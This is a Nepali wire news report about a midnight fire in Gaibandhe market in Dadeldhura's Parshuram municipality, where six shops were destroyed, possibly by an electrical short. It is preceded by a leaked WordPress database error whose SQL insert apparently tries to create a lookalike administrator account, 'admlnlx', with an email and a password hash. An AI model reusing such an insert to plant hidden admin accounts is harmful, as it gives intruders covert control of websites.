WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bz2.mGLIX.KxGnHGN3r4ZLrUpOnF.D1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 13:09:22', '', 'admlnlx', 'admlnlx')
डडेल्धुरा,मंसिर २६ –
परशुराम नगरपालिकाको गाईबाँधे बजारमा शनिबार राति आगलागी हुँदा छ पसल खाद्यान्न सामग्रीका साथै सम्पूर्ण सामग्री पूर्ण रुपले नष्ट भई करोडौँको क्षति भएको छ ।
इलाका प्रहरी कार्यालय जोगबुढालाई उद्धृ्रत गर्दै जिल्ला प्रहरी कार्यालय डडेल्धुराले जनाएअनुसार राति १२ बजे आगलागी भएको थियो । स्थानीयवासी मानबहादुर मालले राससलाई जानकारी गराउनुभयो । पसलभित्र रहेका कुरा नष्ट भएको इलाका प्रहरी कार्यालय जोगबुढाले जनाएको छ ।
मध्यरातमा लागेको आगो आइतबार बिहान अबेरसम्म आएर मात्रै नियन्त्रणमा लिन सकिएको प्रहरीको भनाइ छ । आगो नियन्त्रणमा लिन कठिनाइ हँुदा ठूलो क्षति हुन गएको इलाका प्रशासन कार्यालय जोगबुढाका कार्यालय प्रमुख दत्तुराम पाण्डेयले जानकारी गराउनुभयो । पसलमा विद्युत् तार सर्ट हुँदा आगलागी भएको हुन सक्ने पूर्वानुमान गरिएको छ । क्षतिको पूर्ण विवरण भने आउन बाँकी छ । – रासस